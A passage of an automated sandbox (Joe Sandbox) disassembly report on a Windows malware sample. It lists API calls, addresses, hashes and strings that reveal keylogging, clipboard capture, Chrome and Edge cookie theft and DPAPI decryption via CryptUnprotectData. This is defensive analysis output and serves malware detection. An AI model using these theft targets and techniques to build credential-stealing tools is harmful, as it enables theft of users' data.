                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "$0NG
                                • API String ID: 368326130-3219657780
                                • Opcode ID: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                • Opcode Fuzzy Hash: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]$hdF
                                • API String ID: 1881088180-1379921833
                                • Opcode ID: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                • Opcode Fuzzy Hash: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcslen.LIBCMT ref: 004162F5
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen$CloseCreateValue
                                • String ID: !D@$(x$okmode
                                • API String ID: 3411444782-2931462370
                                • Opcode ID: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                • Opcode Fuzzy Hash: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                • Opcode Fuzzy Hash: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                • Opcode Fuzzy Hash: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                • Opcode Fuzzy Hash: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                                • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 5352f84320cf4356fc5397d5242ef4f16cbe8c43bf069df42c05d2cedde61efe
                                • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                • Opcode Fuzzy Hash: 5352f84320cf4356fc5397d5242ef4f16cbe8c43bf069df42c05d2cedde61efe
                                • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,0040F3BB,?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDC2
                                • GetLastError.KERNEL32(?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDCC
                                • __dosmaperr.LIBCMT ref: 0044BDF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID: pmx
                                • API String ID: 2583163307-624778662
                                • Opcode ID: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                • Instruction ID: 6d8ae8a68538518658f59cc4ec35c635b4eb055c917d93d15d596e37dde74a72
                                • Opcode Fuzzy Hash: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                • Instruction Fuzzy Hash: 59010832A0426066E62462399C4577F6749CB92739F2546AFFD14872D3DB6CCC8182D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                • API String ID: 481472006-3277280411
                                • Opcode ID: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                • Opcode Fuzzy Hash: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 00404F81
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$EventLocalThreadTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 2532271599-1507639952
                                • Opcode ID: accc46308d134a6526fb08aee99d3eab32d11686313fa6232e89ca864bb3edf7
                                • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                • Opcode Fuzzy Hash: accc46308d134a6526fb08aee99d3eab32d11686313fa6232e89ca864bb3edf7
                                • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                • GetLastError.KERNEL32 ref: 0044C296
                                • __dosmaperr.LIBCMT ref: 0044C29D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastPointer__dosmaperr
                                • String ID: PkGNG
                                • API String ID: 2336955059-263838557
                                • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                • SetEvent.KERNEL32(?), ref: 004051D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                • Opcode Fuzzy Hash: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FormatFreeLocalMessage
                                • String ID: @J@$PkGNG
                                • API String ID: 1427518018-1416487119
                                • Opcode ID: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                • Opcode Fuzzy Hash: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Control Panel\Desktop
                                • API String ID: 1818849710-27424756
